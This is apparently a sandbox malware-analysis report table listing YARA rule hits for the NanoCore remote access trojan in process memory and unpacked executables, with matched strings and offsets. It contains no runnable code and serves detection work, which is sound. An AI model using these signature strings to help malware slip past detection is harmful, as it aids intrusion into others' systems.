00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x23edd:$x1: NanoCore.ClientPluginHost 0x23f1a:$x2: IClientNetworkHost 0x27a4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x5bc0:$a: NanoCore 0x23c45:$a: NanoCore 0x23c55:$a: NanoCore 0x23e89:$a: NanoCore 0x23e9d:$a: NanoCore 0x23edd:$a: NanoCore 0x23ca4:$b: ClientPlugin 0x23ea6:$b: ClientPlugin 0x23ee6:$b: ClientPlugin 0x23dcb:$c: ProjectData 0x247d2:$d: DESCrypto 0x2c19e:$e: KeepAlive 0x2a18c:$g: LogClientMessage 0x26387:$i: get_Connected 0x24b08:$j: #=q 0x24b38:$j: #=q 0x24b54:$j: #=q 0x24b84:$j: #=q 0x24ba0:$j: #=q 0x24bbc:$j: #=q 0x24bec:$j: #=q
00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x123e5:$x1: NanoCore.ClientPluginHost 0x12422:$x2: IClientNetworkHost 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1214d:$a: NanoCore 0x1215d:$a: NanoCore 0x12391:$a: NanoCore 0x123a5:$a: NanoCore 0x123e5:$a: NanoCore 0x121ac:$b: ClientPlugin 0x123ae:$b: ClientPlugin 0x123ee:$b: ClientPlugin 0x122d3:$c: ProjectData 0x12cda:$d: DESCrypto 0x1a6a6:$e: KeepAlive 0x18694:$g: LogClientMessage 0x1488f:$i: get_Connected 0x13010:$j: #=q 0x13040:$j: #=q 0x1305c:$j: #=q 0x1308c:$j: #=q 0x130a8:$j: #=q 0x130c4:$j: #=q 0x130f4:$j: #=q 0x13110:$j: #=q
00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x23edd:$x1: NanoCore.ClientPluginHost 0x23f1a:$x2: IClientNetworkHost 0x27a4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x5d10:$a: NanoCore 0x23c45:$a: NanoCore 0x23c55:$a: NanoCore 0x23e89:$a: NanoCore 0x23e9d:$a: NanoCore 0x23edd:$a: NanoCore 0x23ca4:$b: ClientPlugin 0x23ea6:$b: ClientPlugin 0x23ee6:$b: ClientPlugin 0x23dcb:$c: ProjectData 0x247d2:$d: DESCrypto 0x2c19e:$e: KeepAlive 0x2a18c:$g: LogClientMessage 0x26387:$i: get_Connected 0x24b08:$j: #=q 0x24b38:$j: #=q 0x24b54:$j: #=q 0x24b84:$j: #=q 0x24ba0:$j: #=q 0x24bbc:$j: #=q 0x24bec:$j: #=q
00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: INQUIRY.exe PID: 6904	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc3e74:$x1: NanoCore.ClientPluginHost 0xc3eb1:$x2: IClientNetworkHost 0xc79a2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd29e1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: INQUIRY.exe PID: 6904	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: INQUIRY.exe PID: 6904	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xc3b41:$a: NanoCore 0xc3b51:$a: NanoCore 0xc3c10:$a: NanoCore 0xc3c1f:$a: NanoCore 0xc3e20:$a: NanoCore 0xc3e34:$a: NanoCore 0xc3e74:$a: NanoCore 0xcf04b:$a: NanoCore 0xcf05d:$a: NanoCore 0xcf099:$a: NanoCore 0xc3ba0:$b: ClientPlugin 0xc3c69:$b: ClientPlugin 0xc3e3d:$b: ClientPlugin 0xc3e7d:$b: ClientPlugin 0xcf066:$b: ClientPlugin 0xcf0a2:$b: ClientPlugin 0xc3d62:$c: ProjectData 0xcef98:$c: ProjectData 0xc4736:$d: DESCrypto 0xcf8f6:$d: DESCrypto 0xcc0f3:$e: KeepAlive
Process Memory Space: INQUIRY.exe PID: 7084	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x876c:$x1: NanoCore.ClientPluginHost 0x5771b:$x1: NanoCore.ClientPluginHost 0xa454b:$x1: NanoCore.ClientPluginHost 0xda633:$x1: NanoCore.ClientPluginHost 0x1648e5:$x1: NanoCore.ClientPluginHost 0x1d165e:$x1: NanoCore.ClientPluginHost 0x1f7155:$x1: NanoCore.ClientPluginHost 0x87a9:$x2: IClientNetworkHost 0x57758:$x2: IClientNetworkHost 0xa4588:$x2: IClientNetworkHost 0xda64d:$x2: IClientNetworkHost 0x164922:$x2: IClientNetworkHost 0x1d169b:$x2: IClientNetworkHost 0x1f7182:$x2: IClientNetworkHost 0xc29a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x17320:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5b249:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x662cf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa8079:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xb30ff:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x168413:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: INQUIRY.exe PID: 7084	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: INQUIRY.exe PID: 7084	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8439:$a: NanoCore 0x8449:$a: NanoCore 0x8508:$a: NanoCore 0x8517:$a: NanoCore 0x8718:$a: NanoCore 0x872c:$a: NanoCore 0x876c:$a: NanoCore 0x1398a:$a: NanoCore 0x1399c:$a: NanoCore 0x139d8:$a: NanoCore 0x573e8:$a: NanoCore 0x573f8:$a: NanoCore 0x574b7:$a: NanoCore 0x574c6:$a: NanoCore 0x576c7:$a: NanoCore 0x576db:$a: NanoCore 0x5771b:$a: NanoCore 0x62939:$a: NanoCore 0x6294b:$a: NanoCore 0x62987:$a: NanoCore 0xa323a:$a: NanoCore
Process Memory Space: rstmgknbahw.exe PID: 1904	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16db4:$x1: NanoCore.ClientPluginHost 0x30eee:$x1: NanoCore.ClientPluginHost 0x4d492:$x1: NanoCore.ClientPluginHost 0x64da7:$x1: NanoCore.ClientPluginHost 0x7c990:$x1: NanoCore.ClientPluginHost 0x98d6d:$x1: NanoCore.ClientPluginHost 0x9c15a:$x1: NanoCore.ClientPluginHost 0xb6943:$x1: NanoCore.ClientPluginHost 0xcfe90:$x1: NanoCore.ClientPluginHost 0x16df1:$x2: IClientNetworkHost 0x30f2b:$x2: IClientNetworkHost 0x4d4cf:$x2: IClientNetworkHost 0x64de4:$x2: IClientNetworkHost 0x7c9aa:$x2: IClientNetworkHost 0x98d87:$x2: IClientNetworkHost 0x9c197:$x2: IClientNetworkHost 0xb6980:$x2: IClientNetworkHost 0xcfecd:$x2: IClientNetworkHost 0x1a8e2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x25921:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x34a1c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: rstmgknbahw.exe PID: 1904	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: rstmgknbahw.exe PID: 1904	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42e:$a: NanoCore 0x49b:$a: NanoCore 0x50e:$a: NanoCore 0x16a81:$a: NanoCore 0x16a91:$a: NanoCore 0x16b50:$a: NanoCore 0x16b5f:$a: NanoCore 0x16d60:$a: NanoCore 0x16d74:$a: NanoCore 0x16db4:$a: NanoCore 0x21f8b:$a: NanoCore 0x21f9d:$a: NanoCore 0x21fd9:$a: NanoCore 0x30bbb:$a: NanoCore 0x30bcb:$a: NanoCore 0x30c8a:$a: NanoCore 0x30c99:$a: NanoCore 0x30e9a:$a: NanoCore 0x30eae:$a: NanoCore 0x30eee:$a: NanoCore 0x3c0c5:$a: NanoCore
Process Memory Space: rstmgknbahw.exe PID: 5320	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x14bcf:$x1: NanoCore.ClientPluginHost 0x2dfb1:$x1: NanoCore.ClientPluginHost 0x50f26:$x1: NanoCore.ClientPluginHost 0x53922:$x1: NanoCore.ClientPluginHost 0x69593:$x1: NanoCore.ClientPluginHost 0x81eff:$x1: NanoCore.ClientPluginHost 0x98d89:$x1: NanoCore.ClientPluginHost 0x14c0c:$x2: IClientNetworkHost 0x2dfee:$x2: IClientNetworkHost 0x50f40:$x2: IClientNetworkHost 0x5393c:$x2: IClientNetworkHost 0x695d0:$x2: IClientNetworkHost 0x81f3c:$x2: IClientNetworkHost 0x98dc6:$x2: IClientNetworkHost 0x186fd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x23783:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x31adf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3cb65:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6d0c1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x78100:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x85a2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: rstmgknbahw.exe PID: 5320	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: rstmgknbahw.exe PID: 5320	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf542:$a: NanoCore 0xf5af:$a: NanoCore 0xf622:$a: NanoCore 0x1489c:$a: NanoCore 0x148ac:$a: NanoCore 0x1496b:$a: NanoCore 0x1497a:$a: NanoCore 0x14b7b:$a: NanoCore 0x14b8f:$a: NanoCore 0x14bcf:$a: NanoCore 0x1fded:$a: NanoCore 0x1fdff:$a: NanoCore 0x1fe3b:$a: NanoCore 0x2dc7e:$a: NanoCore 0x2dc8e:$a: NanoCore 0x2dd4d:$a: NanoCore 0x2dd5c:$a: NanoCore 0x2df5d:$a: NanoCore 0x2df71:$a: NanoCore 0x2dfb1:$a: NanoCore 0x391cf:$a: NanoCore
Click to see the 99 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.rstmgknbahw.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
6.2.rstmgknbahw.exe.37a3258.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.37a3258.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.37a3258.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.37a3258.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.0.rstmgknbahw.exe.415058.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.415058.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.415058.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.415058.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.rstmgknbahw.exe.2411458.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.rstmgknbahw.exe.2411458.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.rstmgknbahw.exe.2411458.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.rstmgknbahw.exe.2411458.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.0.rstmgknbahw.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.3820e14.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28259:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28286:$x2: IClientNetworkHost
